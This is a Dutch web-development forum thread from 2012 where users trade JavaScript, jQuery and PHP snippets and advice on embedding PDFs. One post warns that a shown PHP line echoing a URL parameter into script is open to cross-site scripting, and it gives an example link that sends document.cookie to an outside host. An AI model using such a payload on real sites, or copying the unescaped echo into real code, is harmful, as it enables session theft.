1 2 3 | <script type="text/javascript"> document.getElementById("content").style.backgroundImage = "url(content/art/S3/S3_img1.jpg)"; </script> |
1 2 3 4 5 6 7 8 9 | <script type="text/javascript"> var section = "S3"; var img = 1; function count() { img = img + 1; document.getElementById("art").style.backgroundImage = "url(content/art/"+section+"/"+section+"_img"+img+".jpg)"; if (img==4) img=0; } </script> |
1 | var section = "<?= $_GET["section"] ?>"; |
Ach, mensen klikken ook op dit soort pareltjes.quote:Op dinsdag 4 december 2012 15:24 schreef KomtTijd... het volgende:
Nu alleen nog mensen zo gek krijgen te klikken op zulks een link:
index.php?section=1;$.ajax({url:"mijnwebsite.cn?andermanslogingegevens="+document.cookie})
Er sterft altijd een beetje van mezelf als ik zulke dingen ziequote:javascript:__doPostBack('ctl00$ContentPlaceHolderPage$BottomPaging$PageButtonRepeater$ctl02$PageLinkButton','')
1 2 3 4 5 6 7 8 9 10 11 | $(document).ready(function(){ // index laden bij start $('#content').load('content/index.php'); // navigatie laden bij klikken $('ul#nav li a').click(function() { var page = $(this).attr('href'); $('#content').load('content/' + page + '.php'); return false; }); }); |
k had example F uit het eerste artikel aangehouden, zal nog even door de css kijken of ik misschien iets verkeerd heb aangepastquote:Op woensdag 5 december 2012 13:20 schreef Catch22- het volgende:
Even een flowtutorial lezen
http://www.alistapart.com/articles/css-floats-101/
http://www.alistapart.com/articles/css-positioning-101/
http://www.jquery4u.com/j(...)-pdf-viewer-plugins/quote:Op vrijdag 7 december 2012 14:12 schreef boem-dikkie het volgende:
Hier mensen ervaring met een simpel framework of plugin (jQuery of Javascript of zo) om een PDF te tonen in een pagina? Ik heb nu een iframe gebruikt maar dat is natuurlijk extreem ouderwets. Plus dat hij in Safari het al niet heel fijn doet, en (ondanks nog niet getest) Internet Explorer dit vast ook niet heel fijn vindt.
PDF.JS al even bekeken maar lijkt me wat lomp voor alleen een PDF tonen zonder knopjes e.d.
PDF.JS te lomp, gViewer zegt dat hij mijn document niet kan vinden. Zelfde error op de voorbeeldpagina, dus waarschijnlijk is de API veranderd? En PDFObject is kut, daar kun je opties aan meegeven die vervolgens helemaal niet werken.quote:Op vrijdag 7 december 2012 14:26 schreef donroyco het volgende:
[..]
http://www.jquery4u.com/j(...)-pdf-viewer-plugins/
Jammerquote:Op vrijdag 7 december 2012 14:44 schreef boem-dikkie het volgende:
[..]
PDF.JS te lomp, gViewer zegt dat hij mijn document niet kan vinden. Zelfde error op de voorbeeldpagina, dus waarschijnlijk is de API veranderd? En PDFObject is kut, daar kun je opties aan meegeven die vervolgens helemaal niet werken.
Ik heb met een iFrame geprobeerd en inmiddels getest in Internet Explorer 6, 7 en 8, Firefox, Chrome en Safari en in alle browsers nagelijk hetzelfde resultaat. Denk dat ik het maar gewoon bij een iframe houd.
1 2 3 4 5 6 7 8 | <div class="note grey" style="left:343px;top:284px;z-index:43" data-id="32"> Test test Test test Test test Test test <div class="author">Henk de Tank</div> </div> <div class="note red" style="left:629px;top:0px;z-index:45" data-id="31"> Doet ie het? <div class="author">Einzzzstein</div> </div> |
1 2 3 | $("div.note").dblclick(function(event) { alert($(event).data("id")); }) |
Nu ook een iFrame maar wel met de API van Google. Die doet het ook in Firefox, waar Firefox zonder plugins normaal vraagt of je de PDF wil openen of downloaden, in plaats van tonen op de pagina. Alle Internet Explorers ondersteunen de Google Docs API en Firefox, Chrome en Safari werken ook prima dus ik vind het mooi zo.quote:Op vrijdag 7 december 2012 15:29 schreef KomtTijd... het volgende:
Iframe is helemaal niet zo gek. Gewoon door de pdf-reader van de gebruiker af laten handelen.
Misschien (als je dat kunt detecteren) zou je zo'n JS-library als fallback kunnen gebruiken voor als de user geen in-browser PDF-reader heeft.
$(this) werkt sowieso wel mooi voor dit soort dingen.quote:Op zaterdag 8 december 2012 11:55 schreef picodealion het volgende:
Het was veel gemakkelijker. .data() doet precies wat jij wil dus mijn oplossing was overbodig. Je moet het alleen niet doen op $(event) maar gewoon op $(this).
this.dataset.id geeft overigens hetzelfde, heb je jQuery dus niet voor nodig, maar in IE8 en lager doet dat niks.
Forum Opties | |
---|---|
Forumhop: | |
Hop naar: |